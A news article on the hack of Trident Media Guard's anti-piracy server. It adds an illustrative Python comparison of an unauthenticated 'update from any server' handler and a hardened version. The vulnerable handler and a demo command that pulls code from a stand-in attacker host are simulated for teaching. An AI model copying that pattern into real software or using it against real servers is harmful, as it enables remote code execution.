The French “three strikes” policy has been put on hold after the private outfit contracted to collect piracy data, Trident Media Guard (TMG), was hacked.
The hackers examined TMG’s data-collecting server and found its anti-piracy software riddled with flaws.
The server was running a custom-written administration program coded in Delphi. It had the novel security innovation of not requiring any authentication at all. After all, a big server containing details on file sharers is never going to be a target for hackers, is it?
Anyone connecting to port 8500 could send commands to the server. True, the command set was limited: shut down or reboot the computer, stop or start a peer-to-peer client, and update the software on the server. What could a hacker possibly do with those?
According to Ars Technica, the update command connects to an FTP server, retrieves a file and then executes it. Rather than connecting to a fixed FTP server, it lets the caller specify the server when the update command is given.
An attacker can therefore set up their own FTP server, put a malicious program on it, and tell the TMG system to update from that attacker-controlled server. The result is arbitrary code execution on the server, reachable by anyone who can talk to port 8500.
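The pattern described above, the “update from whatever server the caller names” command, next to a hardened version of the same handler, as an added example. This is illustrative Python written for this article, not TMG’s Delphi program; the `UPDATE <host> <path>` command syntax, the in-memory stand-ins for FTP servers, the admin token and the signing key are all constructed here, and the HMAC is a stand-in for the asymmetric signature a real updater would check.

```python
import hashlib
import hmac

# Constructed stand-in for the network: hostname -> {path: file bytes}.
# Nothing below opens a socket; these dicts play the role of FTP servers.
FAKE_FTP = {
    "updates.example.net": {"/update.bin": b"echo legitimate update"},
    "attacker.example.org": {"/update.bin": b"echo attacker payload"},
}


def fetch(servers, host, path):
    """Pretend FTP GET: look the file up on the named server."""
    return servers[host][path]


def run(payload):
    """Stand-in for 'execute the downloaded file': return what would have run."""
    return payload.decode()


# --- Vulnerable pattern, as the article describes it ---------------------
def vulnerable_update(command, servers=FAKE_FTP):
    """No authentication, caller chooses the download host, no integrity check.
    command is 'UPDATE <host> <path>'."""
    _, host, path = command.split()
    return run(fetch(servers, host, path))


# --- Hardened pattern ----------------------------------------------------
ADMIN_TOKEN = b"constructed-admin-token"   # assumption: secret provisioned out of band
UPDATE_HOST = "updates.example.net"        # pinned; never taken from the command
UPDATE_PATH = "/update.bin"
SIGNING_KEY = b"constructed-signing-key"   # HMAC keeps the example short; a real
                                           # updater would verify an asymmetric
                                           # signature so the server cannot forge one


def sign(payload):
    return hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()


# Publish the signature next to the legitimate update file.
FAKE_FTP[UPDATE_HOST][UPDATE_PATH + ".sig"] = sign(
    FAKE_FTP[UPDATE_HOST][UPDATE_PATH]).encode()


def hardened_update(command, token, servers=FAKE_FTP):
    """Returns (status, output). Only status 'ok' means something was executed."""
    # 1. Authenticate the caller, with a constant-time comparison.
    if not hmac.compare_digest(token, ADMIN_TOKEN):
        return ("unauthenticated", "")
    if command.split()[0] != "UPDATE":
        return ("unknown command", "")
    # 2. Ignore any host or path in the command; the update source is pinned.
    payload = fetch(servers, UPDATE_HOST, UPDATE_PATH)
    published_sig = fetch(servers, UPDATE_HOST, UPDATE_PATH + ".sig").decode()
    # 3. Verify integrity before executing anything.
    if not hmac.compare_digest(published_sig, sign(payload)):
        return ("bad signature", "")
    return ("ok", run(payload))


if __name__ == "__main__":
    # The vulnerable handler happily runs whatever the attacker's server serves.
    print(vulnerable_update("UPDATE attacker.example.org /update.bin"))
    # The hardened handler ignores the attacker's host and runs the pinned,
    # signature-checked update instead.
    print(hardened_update("UPDATE attacker.example.org /update.bin", ADMIN_TOKEN))
```

The three checks in the hardened handler are independent: authentication stops anonymous callers on port 8500, pinning the source removes the attacker’s ability to choose where the file comes from, and the signature check means that even a compromised or spoofed update server cannot get unsigned code executed.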
It also means that the private networks TMG uses to share IP address information with the French authorities can be attacked from that foothold.
But the problem is that the dodgy network is the key to running the French “three strikes” anti-piracy law.
The HADOPI agency, which enforces the law, has only authorised TMG to collect the IP address data. If TMG can’t do that, the three strikes law is toast.